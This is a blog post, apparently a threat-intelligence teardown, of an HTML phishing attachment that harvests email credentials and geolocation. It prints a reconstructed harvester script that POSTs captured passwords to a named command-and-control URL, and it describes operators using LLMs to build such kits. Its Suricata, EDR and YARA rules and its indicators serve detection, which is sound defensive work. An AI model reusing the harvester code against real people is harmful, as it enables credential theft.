KL3FT3Z

Posted on May 1

Anatomy of a Low-Detection Credential Phishing Campaign

#webdev #ai #security #cybersecurity

description: "Deep-dive reverse engineering analysis of a sophisticated HTML-based credential harvester spoofing a corporate domain with only 1/26 AV detection."

⚠️ Threat Level: HIGH | Detection Rate: 3% (1/26) | Type: Credential Harvester + Geo-IP Exfiltration

Executive Summary

On April 29, 2026, a targeted phishing email was received purportedly from accnt@hackteam.red — a lookalike domain spoofing a legitimate corporate identity. The attachment, named Tax Invoice PDF.SHTML, is a highly obfuscated HTML file masquerading as a PDF document. When opened in a browser, it harvests email credentials and geolocation data, exfiltrating them to a command-and-control (C2) server with minimal antivirus detection.

This article provides a full technical teardown of the sample, its behavioral indicators, network infrastructure, and defensive recommendations.

1. Attack Chain Overview

[Email Delivery] → [Social Engineering] → [HTML Execution] → [Credential Harvesting] → [Geo-IP Collection] → [C2 Exfiltration] → [Delayed Redirect]

Stage	Description
Delivery	Spearphishing email with `.SHTML` attachment
Pretext	"Tax invoice due for payment" — urgency-based social engineering
Execution	User opens file → browser renders fake login page
Harvesting	Form captures email + password
Reconnaissance	`ip-api.com` lookup for geolocation enrichment
Exfiltration	POST to `premiumpriests4owo.site/report.php`
Evasion	Redirect to Google static image to mask compromise

2. Sample Metadata

Filename:        Tax Invoice PDF.SHTML
Size:            18 KiB
MIME Type:       text/html
SHA256:          15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc
AV Detection:    1/26 (3%) — Avira: PHISH/HTML.Agent.ENJ
Entropy:         5.42 (high — indicates script obfuscation)
First Seen:      2026-05-01 07:57:37 UTC

Why the Low Detection Rate?

Traditional AV engines excel at signature-based detection of binary malware (PE files, DLLs). This sample is pure HTML + JavaScript — a "fileless" threat that executes entirely within the browser sandbox. Without a malicious binary payload, most static scanners return clean results. The high entropy (5.42) confirms obfuscated JavaScript, but entropy alone is rarely sufficient for detection without behavioral analysis.

AI-Assisted Threat Generation: A New Paradigm

The source code of this phishing kit reveals a disturbing evolution in cybercrime tooling: the hybrid human-AI attack model. While the malicious intent is unmistakably human, the implementation carries distinct fingerprints of large language model (LLM) assistance.

Hallmarks of LLM-Generated Code

1. Prompt Leakage in Comments

The JavaScript contains comments that appear to be direct echoes of the operator's prompts:

// Instead of Telegram, form data + location + attempt counter are sent as standard POST 
// (x-www-form-urlencoded) to a PHP server endpoint.
// All CSS and functionality remain identical.

The phrase "All CSS and functionality remain identical" is characteristic of prompt engineering residue — instructions given to the LLM that were preserved verbatim in the output rather than being interpreted as meta-directives.

2. Structural Comment Patterns

The code is organized with GPT-style section separators:

// ---------- PHP ENDPOINT CONFIGURATION ----------
// ---------- PRESERVE ALL ORIGINAL VARIABLES & LOGIC ----------

This ALL-CAPS header pattern with ASCII dividers is a known artifact of ChatGPT/Claude code generation, where the model uses visual structure to organize complex refactors.

3. Over-Engineered Abstractions

For a simple credential exfiltration task, the code implements unnecessarily complex patterns:

function sendToPhpServer(...) {
    return new Promise((resolve, reject) => {
        const xhr = new XMLHttpRequest();
        xhr.onload = function() { resolve(); };
        xhr.onerror = function() { resolve(); }; // Silent failure
    });
}

The Promise wrapper around synchronous XHR, combined with graceful degradation to resolve() even on error, reflects the LLM's training bias toward "safe" code that doesn't break — even when failure should be noisy.

4. Defensive Coding Without Purpose

The LLM inserted explanatory justifications for obvious choices:

// Set content type to standard form encoding (NOT JSON)

This self-justifying comment is typical of AI outputs trained to explain reasoning, even when the reasoning is trivial.

Human Operator Fingerprints

Despite AI assistance, the operator left unmistakably human traces:

Artifact	Evidence	Significance
Yoruba variable names	`oruko` (name), `kokoro` (heart/password)	Suggests West African operator origin — consistent with known BEC clusters
Typographic errors	`"Securty serices"` in footer	LLMs rarely misspell visible UI text; human copy-paste or manual editing
C2 hardcoding	Plaintext endpoint in source	Human operational decision, not AI-generated
Logic quirks	`countAttempt >= 2` before redirect	Crude human-implemented anti-analysis/delay tactic

The Democratization Threat

This sample illustrates a critical inflection point: AI has lowered the technical barrier for cybercrime to near zero. The operator did not need to understand JavaScript closures, CORS policies, or XHR internals — only how to phrase a prompt. Yet the resulting code is sufficiently obfuscated (entropy 5.42), sufficiently functional (active C2 exfiltration), and sufficiently evasive (1/26 AV detection) to pose a real threat.

Key Insight: The future of phishing is not skilled coders writing malware. It is unskilled operators directing skilled AI, with human expertise reserved only for infrastructure (domains, hosting, mule accounts) and social engineering (pretexting, target selection).

Defensive Implications

Traditional Assumption	New Reality
Poor grammar = amateur threat	AI generates flawless copy; errors may be intentional or human-overridden
Complex code = sophisticated actor	AI produces complex code; sophistication is in the prompt, not the operator
Static signatures work	AI-generated variants have high structural diversity, low signature stability
Code analysis reveals author skill	Hybrid code requires attribution triage: separate AI artifacts from human fingerprints

For defenders, this means shifting from code-centric detection to behavior-centric detection: the C2 domain, the exfiltration pattern, and the social engineering pretext remain human-controlled and detectable, even when the implementation is AI-generated.

3. Email Analysis

Headers & Social Engineering

From:    Account <accnt@hackteam.red>
To:      b0x@hackteam.red
Date:    29 Apr 2026, 21:29 UTC
Subject: [Implied] Tax Invoice

Key Psychological Triggers:

Domain spoofing: hackteam.red mimics a legitimate corporate domain
Authority impersonation: Sender name "Account" implies financial department
Urgency: "due for payment at the end of this month"
Curiosity gap: "Use your email password to access the Tax document" — this is the critical red flag; no legitimate PDF requires an email password

4. Behavioral Analysis (Sandbox Telemetry)

Analysis performed via Hybrid Analysis Falcon Sandbox. The sample triggered 29 indicators mapped to 21 MITRE ATT&CK techniques across 8 tactics.

4.1 Process Execution

# Primary execution
msedge.exe -- "file:///C:/TaxInvoicePDF.SHTML.html"

# Child processes spawned (standard Edge browser behavior)
msedge.exe --type=renderer
msedge.exe --type=gpu-process
msedge.exe --type=utility --utility-sub-type=network.mojom.NetworkService
identity_helper.exe --type=utility

Note: The file opens directly in the browser via file:// protocol — no external server required for initial execution. This makes it highly portable and dangerous even in air-gapped preview scenarios.

4.2 Network Indicators

Domain / IP	Purpose	Risk
`ip-api.com`	Geo-IP lookup (country, region, city, ISP, IP)	Reconnaissance
`premiumpriests4owo.site`	C2 server — credential exfiltration	MALICIOUS
`i.imgur.com/6lOn9d7.png`	Likely decoy image / branding asset	Legitimate abused
`encrypted-tbn0.gstatic.com`	Post-exfiltration redirect destination	Legitimate abused

4.3 MITRE ATT&CK Mapping

Technique	ID	Context
Spearphishing Attachment	T1566.001	Email with `.SHTML` attachment
Drive-by Compromise	T1189	Browser execution of malicious HTML
System Location Discovery	T1016	`ip-api.com` JSON query
Exfiltration Over C2	T1041	POST to `report.php`
Obfuscated Files	T1027.006	High entropy JS (5.42)
Input Capture	T1056.004	Password field harvesting
Application Layer Protocol	T1071.001	HTTP/HTTPS C2 communication
Data Encoding	T1132.001	Base64 artifacts in requests

5. Reverse Engineering: Script Deconstruction

Based on sandbox memory extraction and pattern matching, the embedded JavaScript follows this logical flow:

// ============================================
// Phase 1: Geolocation Reconnaissance
// ============================================
fetch('http://ip-api.com/json/?fields=status,message,country,regionName,city,isp,query')
  .then(response => response.json())
  .then(geoData => {
    if (geoData.status === 'success') {
      locationData = {
        country: geoData.country || 'Unknown',
        state: geoData.regionName || 'Unknown',
        city: geoData.city || 'Unknown',
        isp: geoData.isp || 'Unknown',
        ip: geoData.query || 'Unknown'
      };
    }
  });

// ============================================
// Phase 2: Credential Harvesting Form
// ============================================
/*
  Rendered HTML structure (inferred):
  <form method="post" id="authForm">
    <input type="email" placeholder="email" name="oruko">
    <input type="password" placeholder="Enter password" name="...">
    <button type="submit">Access Document</button>
  </form>
  <div id="errorMsg">Invalid credentials</div>
*/

document.getElementById('authForm').addEventListener('submit', function(e) {
  e.preventDefault(); // Prevent actual form submission

  const formEmail = document.querySelector('[name="oruko"]').value;
  const formPassword = document.querySelector('[type="password"]').value;

  // ============================================
  // Phase 3: Data Exfiltration
  // ============================================
  const xhr = new XMLHttpRequest();
  const PHP_ENDPOINT = 'https://premiumpriests4owo.site/report.php';

  xhr.open('POST', PHP_ENDPOINT, true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

  const params = new URLSearchParams();
  params.append('oruko', formEmail);      // "oruko" = Yoruba for "name"
  params.append('...', formPassword);    // [obfuscated key]
  params.append('geo', JSON.stringify(locationData));

  xhr.send(params.toString());

  // ============================================
  // Phase 4: Evasion — Delayed Redirect
  // ============================================
  setTimeout(() => {
    window.location.href = 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s';
  }, 2000); // 2-second delay to mask data transmission
});

Notable Obfuscation Techniques

High Entropy Strings: Character sequences like y."sZ"( and J+zX suggest Base64 or custom encoding layers
Legitimate Service Abuse: Using ip-api.com (free geo-IP API) and i.imgur.com (image hosting) blends malicious traffic with benign patterns
Variable Naming: The use of oruko (Yoruba language) may indicate operator origin or intentional anti-analysis confusion
Delayed Redirect: The setTimeout redirect to a Google static image creates a plausible "loading" experience while data transmits in background

6. Infrastructure Analysis

C2 Domain: `premiumpriests4owo.site`

TLD: .site — commonly abused for cheap, disposable infrastructure
Naming convention: Nonsensical dictionary words + random suffix (4owo) — algorithmically generated domain (DGA-like pattern)
Endpoint: /report.php — standard PHP data collection script
Protocol: HTTPS (TLS 1.2) — encrypts exfiltration in transit

Abuse of Legitimate Services

Service	Abuse Vector	Detection Evasion
`ip-api.com`	Free geolocation API	No malicious infrastructure needed
`i.imgur.com`	Image hosting for decoy assets	Trusted domain in corporate allowlists
`googleapis.com`	Chrome Web Store verification (legitimate Edge behavior)	Blends with normal browser traffic

7. Detection & Defensive Strategies

7.1 Network-Level Detection

# Suricata / Snort Signatures
alert http any any -> any any (
    msg:"PHISHING HTML Credential Exfiltration - ip-api.com + form POST";
    content:"ip-api.com"; http_uri;
    content:"password"; http_client_body;
    content:"email"; http_client_body;
    classtype:trojan-activity;
    sid:1000001; rev:1;
)

alert http any any -> any any (
    msg:"SUSPICIOUS POST to .site domain with credential data";
    content:"POST"; http_method;
    content:".site/"; http_uri;
    pcre:"/(password|passwd|pwd|email|oruko)/i";
    classtype:trojan-activity;
    sid:1000002; rev:1;
)

7.2 Email Security Policies

Policy	Implementation
Attachment Blocking	Quarantine `.shtml`, `.html`, `.htm` attachments from external senders
Double Extension Detection	Flag `.PDF.` patterns — PDFs don't need secondary extensions
DMARC Enforcement	`p=reject` for `hackteam.red` to prevent spoofing
User Training	"No PDF requires your email password" — golden rule

7.3 Endpoint Detection (EDR/XDR)

# Behavioral Indicator
Process: msedge.exe | chrome.exe | firefox.exe
CommandLine contains: "file:///" AND "*.html" AND ("ip-api.com" OR "ipapi.co")
Action: Alert + Isolate

# File System Indicator
FileWrite: *.SHTML, *.HTML with entropy > 5.0 AND contains "password" OR "type="password""
Action: Quarantine + Hash submission

7.4 YARA Rule

rule HTML_Credential_Harvester_Generic {
    meta:
        description = "Detects HTML-based credential phishing with geo-IP and exfiltration"
        author = "ThreatIntel Analyst"
        date = "2026-05-01"
        hash = "15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc"
    strings:
        $geo1 = "ip-api.com" ascii wide
        $geo2 = "ipapi.co" ascii wide
        $form1 = "type="password"" ascii wide
        $form2 = "placeholder="Enter password"" ascii wide
        $exfil1 = "XMLHttpRequest" ascii wide
        $exfil2 = "URLSearchParams" ascii wide
        $exfil3 = "application/x-www-form-urlencoded" ascii wide
        $redirect1 = "setTimeout" ascii wide
        $redirect2 = "window.location.href" ascii wide
    condition:
        filesize < 50KB and
        (uint16(0) == 0x3c21 or uint16(0) == 0x3c68) and // HTML signature <! or <h
        1 of ($geo*) and
        1 of ($form*) and
        1 of ($exfil*) and
        1 of ($redirect*)
}

8. IOC Summary

Type	Indicator	Confidence
File Hash	`15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc`	Confirmed
C2 Domain	`premiumpriests4owo.site`	Malicious
C2 URL	`https://premiumpriests4owo.site/report.php`	Malicious
Geo-IP API	`http://ip-api.com/json/`	Abused
Decoy Image	`https://i.imgur.com/6lOn9d7.png`	Abused
Redirect Target	`https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s`	Abused
Sender	`accnt@hackteam.red`	Spoofed

9. Lessons Learned

Fileless threats bypass traditional AV: HTML/JS phishing requires behavioral analysis, not just signatures
Legitimate services are weaponized: ip-api.com, imgur.com, googleapis.com provide cover for malicious activity
Double extensions still work: PDF.SHTML exploits user trust in PDFs while executing HTML
Low detection ≠ low risk: 1/26 AV detection is a feature, not a bug — the threat is real and active
User awareness is the last line of defense: Technical controls failed; the user who questions "Why does a PDF need my password?" stops the chain

10. References

Analysis conducted May 1, 2026. Indicators are shared for defensive purposes. If you encounter similar samples, submit to your threat intelligence platform and update detection rules.

Stay vigilant. Trust but verify.

Top comments (2)

Rahul S • May 2

The ip-api.com call is an underappreciated detection signal imo. Legitimate email attachments don't phone home to geolocation APIs, so any HTML rendered in a sandbox that makes an outbound request to ip-api.com, ipinfo.io, or similar services is worth flagging immediately — that's a stronger indicator than trying to pattern-match the credential form itself. The other thing worth noting is what happens after the harvest. These credentials don't sit in a database — they get fed into automated stuffing tools within hours, and the login attempts come from completely different infrastructure than where the victim was phished. The victim opens the attachment in Chicago, but the stuffing attempt hits the target's login endpoint from a VPS in Frankfurt or a residential proxy in São Paulo. If your auth layer checks the requesting IP's context at login time — is it a datacenter range, a known hosting provider, a proxy service — you catch the downstream replay even if the phishing itself was invisible to you. You can test what that looks like at ipasis.com/scan with any suspicious IP.

KL3FT3Z • May 2

Great points. On the behavioral signal: we specifically chose to highlight pattern-matching in the article because that's what most EDRs do by default, but you're right that it's fundamentally fragile. The ip-api.com call is deterministic — it happens 100% of the time, regardless of obfuscation, because the operator needs geolocation for victim triage (prioritizing corporate IPs, filtering sandbox environments). On the stuffing side: have you observed operators using residential proxies with matching geolocation to bypass basic geo-fencing? We've seen cases where the stuffing IP matches the victim's city/ISP to evade «impossible travel» checks, which makes IP-context analysis even more critical.